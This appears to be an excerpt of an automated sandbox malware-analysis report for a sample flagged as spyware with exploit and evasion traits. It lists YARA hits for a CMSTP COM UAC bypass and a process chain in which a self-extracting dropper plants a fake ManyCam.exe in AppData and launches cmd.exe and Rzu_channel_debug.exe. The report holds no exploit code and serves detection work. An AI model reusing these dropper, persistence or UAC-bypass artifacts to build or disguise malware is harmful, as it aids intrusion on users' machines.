Source: 5.2.cmd.exe.566eacd.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.Rzu_channel_debug.exe.2640a20.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.Rzu_channel_debug.exe.26866ed.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.Rzu_channel_debug.exe.2685aed.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.cmd.exe.566f6cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.Rzu_channel_debug.exe.274caed.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.4acca00.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.56b26cd.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.4b126cd.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.spyw.expl.evad.winEXE@28/25@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6EF6B8AD4 GetLastError,FormatMessageW,

0_2_00007FF6EF6B8AD4

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe

Code function: 1_2_004B2100 CoCreateInstance,

1_2_004B2100

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6EF6D0C0C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF6EF6D0C0C

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe

File created: C:\Users\user\AppData\Roaming\EH_Monitor_test

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 18%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Process created: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Process created: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: cximagecrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: cxcore099.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: cv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: highgui099.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: crashrpt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippopencv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippopencv097.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippcv-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippcv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippcv20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippi-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippi20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ipps-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ipps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ipps20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippvm-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippvm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippvm20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippcc-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippcc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ippcc20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: mkl_p4.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: mkl_p3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: mkl_def.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: pcaui.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cximagecrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cxcore099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: highgui099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: crashrpt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippopencv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippopencv097.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcv-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcv20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippi-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippi20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ipps-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ipps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ipps20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippvm-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippvm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippvm20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcc-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcc20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: mkl_p4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: mkl_p3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: mkl_def.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: pcaui.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: apphelp.dll	Jump to behavior
